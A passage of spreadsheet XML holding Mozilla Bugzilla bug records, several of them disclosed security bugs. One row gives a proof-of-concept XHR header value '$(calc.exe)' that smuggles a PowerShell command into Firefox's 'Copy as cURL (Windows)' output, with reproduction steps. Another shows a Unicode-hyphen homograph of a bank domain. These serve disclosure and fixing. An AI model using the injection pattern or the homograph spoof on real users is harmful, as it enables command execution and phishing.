      <c r="Q4258" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4258" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4258" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T4258" t="n">
        <v>1</v>
      </c>
      <c r="U4258" t="n">
        <v>0</v>
      </c>
      <c r="V4258" t="n">
        <v>4</v>
      </c>
      <c r="W4258" t="inlineStr">
        <is>
          <t>In buglist.cgi, the string "thisrandomstring" is used for the break between
server pushed content.  Unfortunately, there is a case mismatch in that one of
the strings uses capitals, and later on, it does not.  The Apache web server
has no idea how to handle this and therefore doesn't send anything back when
this script is called.  Although this is probably more of an Apache bug, there
isn't any reason why buglist.cgi shouldn't remain consistant in it's use of
capitalization in the server push break string.</t>
        </is>
      </c>
      <c r="X4258" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4259">
      <c r="A4259" t="n">
        <v>295456</v>
      </c>
      <c r="B4259" t="inlineStr">
        <is>
          <t>2005-05-25 03:02:20 -0700</t>
        </is>
      </c>
      <c r="C4259" t="inlineStr">
        <is>
          <t>404 Errors include an error for "/page.cgi/&lt;filename&gt;" too</t>
        </is>
      </c>
      <c r="D4259" t="inlineStr">
        <is>
          <t>2006-10-20 22:21:57 -0700</t>
        </is>
      </c>
      <c r="E4259" t="n">
        <v>1</v>
      </c>
      <c r="F4259" t="n">
        <v>1</v>
      </c>
      <c r="G4259" t="n">
        <v>4</v>
      </c>
      <c r="H4259" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4259" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4259" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K4259" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4259" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4259" t="inlineStr"/>
      <c r="Q4259" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4259" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4259" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4259" t="n">
        <v>1</v>
      </c>
      <c r="U4259" t="n">
        <v>0</v>
      </c>
      <c r="V4259" t="n">
        <v>9</v>
      </c>
      <c r="W4259" t="inlineStr">
        <is>
          <t>On the live www.bz.org site, 404 errors include two errors:
404 Page Not Found
The requested URL /installation_list.html was not found on this server.
Apache/2.0.46 (Red Hat) Server at www.bugzilla.org Port 80
and
Not Found
The requested URL /page.cgi/installation_list.html.tmpl was not found on this
server.
Apache/2.0.46 (Red Hat) Server at www.bugzilla.org Port 80
However, on my checkout of the site, and on landfill
(http://landfill.mozilla.org/bugzilla.org/installation-list.html) - this
produces just the first error.</t>
        </is>
      </c>
      <c r="X4259" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4260">
      <c r="A4260" t="n">
        <v>1663571</v>
      </c>
      <c r="B4260" t="inlineStr">
        <is>
          <t>2020-09-07 23:07:10 -0700</t>
        </is>
      </c>
      <c r="C4260" t="inlineStr">
        <is>
          <t>Info leak in the local area network when seach string(not domain) directly in the inbox(Windows 10)</t>
        </is>
      </c>
      <c r="D4260" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:29 -0700</t>
        </is>
      </c>
      <c r="E4260" t="n">
        <v>1</v>
      </c>
      <c r="F4260" t="n">
        <v>1</v>
      </c>
      <c r="G4260" t="n">
        <v>3</v>
      </c>
      <c r="H4260" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4260" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4260" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4260" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4260" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4260" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][adv-main83+][adv-esr78.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4260" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4260" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T4260" t="n">
        <v>1</v>
      </c>
      <c r="U4260" t="n">
        <v>0</v>
      </c>
      <c r="V4260" t="n">
        <v>79</v>
      </c>
      <c r="W4260" t="inlineStr">
        <is>
          <t>Created attachment 9174314
pocfox.gif
When you search "WillBeLeakedString" directly in the inbox, the Firefox will send the mDNS "willbeleakedstring.local" packet and bordcast to the local area network.
I have tested in the LAN and I can monitor what my colleagues have searched in the Firefox inbox.
I can also monitor in the VMWare what I have searched in the Host Machine(see the poc.gif).
The result is that any node in the LAN can monitor what others(Windows10 OS) have searched in the inbox via the Firefox Browser.</t>
        </is>
      </c>
      <c r="X4260" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4261">
      <c r="A4261" t="n">
        <v>1615471</v>
      </c>
      <c r="B4261" t="inlineStr">
        <is>
          <t>2020-02-13 15:28:41 -0800</t>
        </is>
      </c>
      <c r="C4261" t="inlineStr">
        <is>
          <t>Command injection in the "Copy as cURL (Windows)" feature</t>
        </is>
      </c>
      <c r="D4261" t="inlineStr">
        <is>
          <t>2024-05-30 10:11:45 -0700</t>
        </is>
      </c>
      <c r="E4261" t="n">
        <v>1</v>
      </c>
      <c r="F4261" t="n">
        <v>1</v>
      </c>
      <c r="G4261" t="n">
        <v>3</v>
      </c>
      <c r="H4261" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4261" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J4261" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K4261" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4261" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4261" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [post-critsmash-triage][adv-main76+][adv-ESR68.8+]</t>
        </is>
      </c>
      <c r="Q4261" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4261" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T4261" t="n">
        <v>1</v>
      </c>
      <c r="U4261" t="n">
        <v>0</v>
      </c>
      <c r="V4261" t="n">
        <v>13</v>
      </c>
      <c r="W4261" t="inlineStr">
        <is>
          <t>Created attachment 9126600
example_POC.html
Firefox does not perform any kind of escaping on $ characters in the "Copy as cURL (Windows)" functionality. This allows a PowerShell subexpression to be used in the copied cURL command, which if pasted into PowerShell will lead to command injection. This would be possible by creating a request which contains the $() characters in any portion which does not get URL encoded.
For example, the following code snippet with create a request with an unencoded header containing the value $(calc.exe) which will execute calc.exe if the request is copied using "Copy as cURL (Windows)" and pasted into PowerShell.
  xhttp.open("GET", "//example.com:8000", true);
  xhttp.setRequestHeader("test", "$(calc.exe)"); 
  xhttp.send();
Steps to reproduce
1. Use something like python -m SimpleHTTPServer to serve the  attached example_POC.html locally.
2. open http://127.0.0.1:8000/example_POC.html in Firefox
3. Open dev tools with F12 and click the Network tab
4. click the "Request data" button
5. Right click the request that is sent and click "Copy as cURL(windows)"
6. Open Powershell, paste the command and hit enter
7. calc.exe will open
I have also attached an HTML page which can be open in Firefox.</t>
        </is>
      </c>
      <c r="X4261" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4262">
      <c r="A4262" t="n">
        <v>337825</v>
      </c>
      <c r="B4262" t="inlineStr">
        <is>
          <t>2006-05-13 04:21:57 -0700</t>
        </is>
      </c>
      <c r="C4262" t="inlineStr">
        <is>
          <t>Add Bookmark dialog: microsummary picker should be disabled or hidden when no summary is available</t>
        </is>
      </c>
      <c r="D4262" t="inlineStr">
        <is>
          <t>2016-02-12 06:59:33 -0800</t>
        </is>
      </c>
      <c r="E4262" t="n">
        <v>1</v>
      </c>
      <c r="F4262" t="n">
        <v>1</v>
      </c>
      <c r="G4262" t="n">
        <v>6</v>
      </c>
      <c r="H4262" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4262" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4262" t="inlineStr">
        <is>
          <t>Microsummaries</t>
        </is>
      </c>
      <c r="K4262" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4262" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4262" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4262" t="inlineStr"/>
      <c r="Q4262" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4262" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4262" t="inlineStr">
        <is>
          <t>Firefox 2 beta1</t>
        </is>
      </c>
      <c r="T4262" t="n">
        <v>1</v>
      </c>
      <c r="U4262" t="n">
        <v>0</v>
      </c>
      <c r="V4262" t="n">
        <v>13</v>
      </c>
      <c r="W4262" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060513 BonEcho/2.0a2
In the Add Bookmark dialog, the microsummary picker displays "" in the closed state. If you click on the expander, it looks like this:
         Don't Display a Summary   V
         Don't Display a Summary
The menu list should be disabled when no summary is available and there's nothing to choose.</t>
        </is>
      </c>
      <c r="X4262" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4263">
      <c r="A4263" t="n">
        <v>1606317</v>
      </c>
      <c r="B4263" t="inlineStr">
        <is>
          <t>2019-12-30 05:28:41 -0800</t>
        </is>
      </c>
      <c r="C4263" t="inlineStr">
        <is>
          <t>ignorehttpserrors.spec.js:30:5 - FAILED while running "beforeEach" in suite "Firefox ignoreHTTPSErrors"</t>
        </is>
      </c>
      <c r="D4263" t="inlineStr">
        <is>
          <t>2021-04-12 15:29:44 -0700</t>
        </is>
      </c>
      <c r="E4263" t="n">
        <v>1</v>
      </c>
      <c r="F4263" t="n">
        <v>1</v>
      </c>
      <c r="G4263" t="n">
        <v>3</v>
      </c>
      <c r="H4263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4263" t="inlineStr">
        <is>
          <t>Remote Protocol</t>
        </is>
      </c>
      <c r="J4263" t="inlineStr">
        <is>
          <t>CDP</t>
        </is>
      </c>
      <c r="K4263" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4263" t="inlineStr">
        <is>
          <t>[puppeteer-beta-mvp]</t>
        </is>
      </c>
      <c r="Q4263" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4263" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4263" t="inlineStr">
        <is>
          <t>Firefox 73</t>
        </is>
      </c>
      <c r="T4263" t="n">
        <v>1</v>
      </c>
      <c r="U4263" t="n">
        <v>0</v>
      </c>
      <c r="V4263" t="n">
        <v>20</v>
      </c>
      <c r="W4263" t="inlineStr">
        <is>
          <t>Puppeteer unit tests for `ignorehttpserrors.spec.js` currently fail because of:
```
Error: Protocol error (Security.setIgnoreCertificateErrors): Component returned failure code: 0x80040111 (NS_ERROR_NOT_AVAILABLE) [nsICertOverrideService.setDisableAllSecurityChecksAndLetAttackersInterceptMyData] setIgnoreCertificateErrors@chrome://remote/content/domains/parent/Security.jsm:51:25
```
Reason here is that this method cannot be called via the Remote Protocol right now due to access limitations:
https://searchfox.org/mozilla-central/rev/a46d0fc0e7bf06b64a8d27e2cdbeeee94ecc7ad1/security/manager/ssl/nsCertOverrideService.cpp#614-615
We will have to add an exclusion for the Remote Protocol too. I wonder why the tests in `remote/tests/browser/security/browser_setIgnoreCertificateErrors.js` work. Maybe it's failing by Puppeteer because it's getting set before the browser gets started?
Andreas, given that you implemented that for Marionette and Remote Agent maybe you could have a look at? Right now this is causing a crash of Firefox when running Puppeteer unit tests.</t>
        </is>
      </c>
      <c r="X4263" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4264">
      <c r="A4264" t="n">
        <v>482302</v>
      </c>
      <c r="B4264" t="inlineStr">
        <is>
          <t>2009-03-09 12:43:23 -0700</t>
        </is>
      </c>
      <c r="C4264" t="inlineStr">
        <is>
          <t>Fennec visual polish</t>
        </is>
      </c>
      <c r="D4264" t="inlineStr">
        <is>
          <t>2009-06-15 19:43:19 -0700</t>
        </is>
      </c>
      <c r="E4264" t="n">
        <v>1</v>
      </c>
      <c r="F4264" t="n">
        <v>1</v>
      </c>
      <c r="G4264" t="n">
        <v>2</v>
      </c>
      <c r="H4264" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4264" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J4264" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4264" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4264" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4264" t="inlineStr"/>
      <c r="Q4264" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4264" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4264" t="inlineStr">
        <is>
          <t>0.3</t>
        </is>
      </c>
      <c r="T4264" t="n">
        <v>1</v>
      </c>
      <c r="U4264" t="n">
        <v>0</v>
      </c>
      <c r="V4264" t="n">
        <v>3</v>
      </c>
      <c r="W4264" t="inlineStr">
        <is>
          <t>General polish for Weave 0.3 on Fennec.</t>
        </is>
      </c>
      <c r="X4264" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4265">
      <c r="A4265" t="n">
        <v>519382</v>
      </c>
      <c r="B4265" t="inlineStr">
        <is>
          <t>2009-09-28 19:36:12 -0700</t>
        </is>
      </c>
      <c r="C4265" t="inlineStr">
        <is>
          <t>Developer Tools tweaks, pt. II</t>
        </is>
      </c>
      <c r="D4265" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E4265" t="n">
        <v>1</v>
      </c>
      <c r="F4265" t="n">
        <v>1</v>
      </c>
      <c r="G4265" t="n">
        <v>6</v>
      </c>
      <c r="H4265" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4265" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4265" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K4265" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4265" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4265" t="inlineStr"/>
      <c r="Q4265" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4265" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4265" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="T4265" t="n">
        <v>1</v>
      </c>
      <c r="U4265" t="n">
        <v>0</v>
      </c>
      <c r="V4265" t="n">
        <v>3</v>
      </c>
      <c r="W4265" t="inlineStr">
        <is>
          <t>1. Please remove the Developer Hub sidebar from https://preview.addons.mozilla.org/en-US/developers/addon/validate
2. On the previews page, when I click Add Preview multiple times, the labels need line breaks
3. Please add some disc bullets to the lists on the Developer Profile and Contributions intro pages.
Thanks!</t>
        </is>
      </c>
      <c r="X4265" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4266">
      <c r="A4266" t="n">
        <v>1323338</v>
      </c>
      <c r="B4266" t="inlineStr">
        <is>
          <t>2016-12-13 16:11:35 -0800</t>
        </is>
      </c>
      <c r="C4266" t="inlineStr">
        <is>
          <t>Unicode hyphens in domain names are not blacklisted</t>
        </is>
      </c>
      <c r="D4266" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:14 -0700</t>
        </is>
      </c>
      <c r="E4266" t="n">
        <v>1</v>
      </c>
      <c r="F4266" t="n">
        <v>1</v>
      </c>
      <c r="G4266" t="n">
        <v>3</v>
      </c>
      <c r="H4266" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4266" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4266" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4266" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L4266" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4266" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4266" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4266" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q4266" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4266" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4266" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4266" t="n">
        <v>1</v>
      </c>
      <c r="U4266" t="n">
        <v>0</v>
      </c>
      <c r="V4266" t="n">
        <v>31</v>
      </c>
      <c r="W4266" t="inlineStr">
        <is>
          <t>When used in domain names, the Unicode glyphs U+2010 (HYPHEN) and U+2011 (NON-BREAKING HYPHEN) are not converted to Punycode, thus allowing IDN homograph attacks.
This is a bank: https://www.deutsche-bank.de/
This is not a bank: https://www.deutsche‐bank.de/
In my browser the characters are indistinguishable. Instead, the latter one should be displayed as "xn--deutschebank-n09f.de".
Note that these two seem to be the only remaining instances of hyphen-confusables that don't end up as Punycode, as I checked against this list: http://unicode.org/cldr/utility/confusables.jsp?a=-&amp;r=None</t>
        </is>
      </c>
      <c r="X4266" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4267">
      <c r="A4267" t="n">
        <v>1429379</v>
      </c>
      <c r="B4267" t="inlineStr">
        <is>
          <t>2018-01-10 04:56:36 -0800</t>
        </is>
      </c>
      <c r="C4267" t="inlineStr">
        <is>
          <t>Web extensions can open any url using view-source:</t>
        </is>
      </c>
      <c r="D4267" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:42 -0700</t>
        </is>
      </c>
      <c r="E4267" t="n">
        <v>1</v>
      </c>
      <c r="F4267" t="n">
        <v>1</v>
      </c>
      <c r="G4267" t="n">
        <v>3</v>
      </c>
      <c r="H4267" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4267" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4267" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K4267" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L4267" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4267" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4267" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q4267" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4267" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4267" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T4267" t="n">
        <v>1</v>
      </c>
      <c r="U4267" t="n">
        <v>0</v>
      </c>
      <c r="V4267" t="n">
        <v>29</v>
      </c>
      <c r="W4267" t="inlineStr">
        <is>
          <t>Created attachment 8941398
POC.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Steps to reproduce:
Install attached extension
Actual results:
view-source urls for a file URL and about:cache is opened
Expected results:
blocked the same way as when opening directly</t>
        </is>
      </c>
      <c r="X4267" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4268">
      <c r="A4268" t="n">
        <v>851353</v>
      </c>
      <c r="B4268" t="inlineStr">
        <is>
          <t>2013-03-14 16:39:57 -0700</t>
        </is>
      </c>
      <c r="C4268" t="inlineStr">
        <is>
          <t>compartment mismatch in nsXBLBinding::DoInitJSClass</t>
        </is>
      </c>
      <c r="D4268" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:20 -0700</t>
        </is>
      </c>
      <c r="E4268" t="n">
        <v>1</v>
      </c>
      <c r="F4268" t="n">
        <v>1</v>
      </c>
      <c r="G4268" t="n">
        <v>3</v>
      </c>
      <c r="H4268" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4268" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4268" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K4268" t="inlineStr">
        <is>
          <t>21 Branch</t>
        </is>
      </c>
      <c r="L4268" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4268" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4268" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4268" t="inlineStr">
        <is>
          <t>[asan][adv-main24+]</t>
        </is>
      </c>
      <c r="Q4268" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4268" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4268" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4268" t="n">
        <v>1</v>
      </c>
      <c r="U4268" t="n">
        <v>0</v>
      </c>
      <c r="V4268" t="n">
        <v>79</v>
      </c>
      <c r="W4268" t="inlineStr">
        <is>
          <t>Created attachment 725161
firefox_2.html (may crash!)
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Build ID: 20120713224749
Steps to reproduce:
please see the attachments</t>
        </is>
      </c>
      <c r="X4268" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4269">
      <c r="A4269" t="n">
        <v>1393214</v>
      </c>
      <c r="B4269" t="inlineStr">
        <is>
          <t>2017-08-23 13:41:52 -0700</t>
        </is>
      </c>
      <c r="C4269" t="inlineStr">
        <is>
          <t>Add new user to search re:dash group</t>
        </is>
      </c>
      <c r="D4269" t="inlineStr">
        <is>
          <t>2023-03-27 08:09:05 -0700</t>
        </is>
      </c>
      <c r="E4269" t="n">
        <v>1</v>
      </c>
      <c r="F4269" t="n">
        <v>1</v>
      </c>
      <c r="G4269" t="n">
        <v>2</v>
      </c>
      <c r="H4269" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4269" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4269" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4269" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4269" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4269" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4269" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4269" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q4269" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4269" t="n">
        <v>1</v>
      </c>
      <c r="U4269" t="n">
        <v>0</v>
      </c>
      <c r="V4269" t="n">
        <v>2</v>
      </c>
      <c r="W4269" t="inlineStr">
        <is>
          <t>In Bug 1382203 we created a Search group for re:dash. Can we add the following users to that group?
* William Lachance
* Anthony Miyaguchi
Thanks!</t>
        </is>
      </c>
      <c r="X4269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4270">
      <c r="A4270" t="n">
        <v>1760998</v>
      </c>
      <c r="B4270" t="inlineStr">
        <is>
          <t>2022-03-23 06:40:06 -0700</t>
        </is>
      </c>
      <c r="C4270" t="inlineStr">
        <is>
          <t>Intermittent SUMMARY: ThreadSanitizer: data race /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:657:29 in sftkdb_switchKeys</t>
        </is>
      </c>
      <c r="D4270" t="inlineStr">
        <is>
          <t>2023-01-16 20:44:27 -0800</t>
        </is>
      </c>
      <c r="E4270" t="n">
        <v>1</v>
      </c>
      <c r="F4270" t="n">
        <v>1</v>
      </c>
      <c r="G4270" t="n">
        <v>3</v>
      </c>
      <c r="H4270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4270" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4270" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4270" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L4270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4270" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4270" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main103+][adv-esr102.2+]</t>
        </is>
      </c>
      <c r="Q4270" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4270" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S4270" t="inlineStr">
        <is>
          <t>3.80</t>
        </is>
      </c>
      <c r="T4270" t="n">
        <v>1</v>
      </c>
      <c r="U4270" t="n">
        <v>0</v>
      </c>
      <c r="V4270" t="n">
        <v>8</v>
      </c>
      <c r="W4270" t="inlineStr">
        <is>
          <t>**Filed by:** mlaza [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer?job_id=372055923&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/G560dVCyTB6eDQYbysjRcw/runs/0/artifacts/public/logs/live_backing.log
---
```
[task 2022-03-23T12:46:44.566Z] 12:46:44     INFO - TEST-START | browser/components/enterprisepolicies/tests/browser/browser_policy_masterpassword.js
[task 2022-03-23T12:46:44.844Z] 12:46:44     INFO - GECKO(2993) | MP change from  to omgsecret!
